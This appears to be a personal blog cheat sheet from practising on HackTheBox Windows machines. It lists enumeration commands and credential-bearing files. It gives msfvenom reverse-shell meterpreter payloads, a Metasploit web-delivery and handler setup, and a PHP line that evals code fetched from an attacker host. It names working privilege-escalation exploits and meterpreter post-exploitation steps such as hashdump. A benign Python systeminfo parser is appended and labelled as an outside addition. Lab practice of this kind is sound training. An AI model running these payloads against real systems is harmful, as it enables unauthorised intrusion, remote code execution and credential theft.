I rooted many Windows rigs in the last week. You can practice your skills too: just go to hackthebox.eu. Here I will not tell you specifically how to root those vulnerable Windows machines; I just want to keep some of the basics that I learned from this.
As expected, the information gathering is the same: nmap, nikto, dirb, etc.
The Windows command line: as I am used to the Unix bash shell, this command line was like Korean to me.
Here are the basic commands that are useful:
type is the equivalent of cat
dir is the equivalent of ls
systeminfo: use it with a Windows vuln finder and to learn more about the device you are hacking
sc: start and stop services
find: the search function
Inside the rig there are commands to do some more gathering:
>whoami
>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"    (condensed systeminfo)
>hostname
>echo %username%
>net user
>ipconfig /all
>arp -A
>route print
>netstat -ano and netsh firewall show state    (see active network connections and firewall rules)
>schtasks /query /fo LIST /v    (displays a shitload of scheduled tasks)
>tasklist /SVC    (links running processes to started services)
>net start    (to see started Windows services)
>DRIVERQUERY    (shows all possibly vulnerable drivers and their dates of birth)
Sometimes you can find info inside these files; it is a good idea to check:
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
To make the work easier and find obvious vulns we can use wmic; this way we can find which patches are installed on the rig:
wmic qfe get Caption,Description,HotFixID,InstalledOn
How to gain a meterpreter shell:
One machine had its FTP open to anonymous connections, so:
msfvenom -f aspx -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4443 -e x86/shikata_ga_nai -o exploit.aspx
Other practical msfvenom payloads:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
use exploit/multi/script/web_delivery
set target 1
set lhost x.x.x.x
set payload php/meterpreter/reverse_tcp
run
<?php eval(file_get_contents('http://MYIP:8080/xxxxxxxxx')); ?>
Basic remote handler:
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
(see https://netsec.ws/?p=331 for other good Windows payloads)
These are some vulns that gave me a shell: ms10_015_kitrap0d, rejetto_hfs_exec, escalation with ms16_032_secondary_logon_handle_privesc, ScStoragePathFromUrl then a reverse shell.exe somewhere and then ms14_058_track_popup_menu, EternalBlue.
Once we have a meterpreter session, we can use it for more information gathering:
meterpreter >getuid
meterpreter >sysinfo
meterpreter >ipconfig
meterpreter >search -f *.txt
meterpreter >use post/multi/recon/local_exploit_suggester
meterpreter >use post/windows/gather/enum_patches
meterpreter >use post/windows/gather/enum_applications
meterpreter >hashdump
The last thing is windows-exploit-suggester.py: you feed it the full systeminfo output and it gives you exploits the same way the Metasploit local exploit suggester does.
./windows-exploit-suggester.py --update
sudo apt-get install python-xlrd
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
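As an added example (my own code, not part of the original post or of windows-exploit-suggester): a small Python parser that condenses raw systeminfo output the way the findstr command above does and pulls out the installed hotfix list, so you can check a box's patch level against a baseline of required KBs before handing the file to a suggester. The systeminfo text, hostname and KB numbers below are constructed placeholders, not output from a real host.

```python
import re
from typing import Dict, List

# Constructed sample of `systeminfo` output (not captured from a real host);
# the hostname and KB numbers are placeholders chosen for illustration only.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN-EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1000001
                           [02]: KB1000002
                           [03]: KB1000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# A top-level systeminfo line is "Key:   value"; continuation lines are indented.
KEY_RE = re.compile(r"^(?P<key>[A-Za-z][^:]*?):\s*(?P<value>.*)$")
# Hotfix continuation lines look like "[01]: KB1234567".
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Condense raw systeminfo text into the fields a patch audit needs."""
    info: Dict[str, object] = {"os_name": "", "os_version": "", "hotfixes": []}
    section = ""
    for line in text.splitlines():
        if line and not line[0].isspace():
            m = KEY_RE.match(line)
            if not m:
                continue
            section = m.group("key").strip()
            if section == "OS Name":
                info["os_name"] = m.group("value").strip()
            elif section == "OS Version":
                info["os_version"] = m.group("value").strip()
        elif section == "Hotfix(s)":
            # Only indented lines under Hotfix(s) are KBs; NIC lines are skipped.
            kb = KB_RE.search(line)
            if kb:
                info["hotfixes"].append(kb.group(1))
    return info


def missing_hotfixes(info: Dict[str, object], required: List[str]) -> List[str]:
    """Return the required KBs that systeminfo did not list as installed."""
    installed = set(info["hotfixes"])
    return sorted(kb for kb in required if kb not in installed)
```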
Some resources:
Easy Remote Shells with Web Delivery
For safekeeping: https://www.ambionics.io/blog/drupal-services-module-rce